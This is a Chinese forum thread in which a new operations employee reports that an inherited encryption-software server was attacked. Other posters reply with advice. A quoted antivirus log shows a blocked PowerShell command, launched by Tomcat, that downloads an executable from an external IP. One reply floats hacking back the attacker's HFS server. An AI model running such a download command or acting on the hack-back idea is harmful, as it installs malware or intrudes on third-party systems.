嘟嘟社区

入职新公司运维岗,结果服务器被搞了


本帖最后由 coolday 于 2022-10-17 16:05 编辑

有一台公司的旧的加密软件的服务端服务器(不是我部署的,是离职前的运维部署的。)
今天上去一看,被搞了,还好被杀软拦了下来

防护项目:Web服务器
操作目标:【执行】 C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
操作目标参数:powershell (new-object System.Net.WebClient).DownloadFile(‘http://23.224.232.147:7777/TF/svcyr.exe’,’window.exe’)
操作结果:已阻止

保护进程路径:C:Program Files (x86)ESAFENETCDocGuard Servertomcat64bintomcat8.exe
保护进程命令行:"C:Program Files (x86)ESAFENETCDocGuard Servertomcat64bintomcat8.exe" //RS//CobraDG

这怎么办。。?

重装保平安
好家伙 cera的IP

刚入职几天,还不了解情况
不敢乱动服务器。

报告老板,

这家伙用的cera的IP 搭建的HFS文件服务器
我记得HFS好像是有漏洞来着?
可以反搞他不?

给tomcat降权、
只是负责加解密的先限制下出入的IP呢
看见23开头的ip 就很眼熟

forgeter 发表于 2022-10-17 16:11
看见23开头的ip 就很眼熟

cera的IP啊, 也是为了抓鸡挖矿煞费苦心。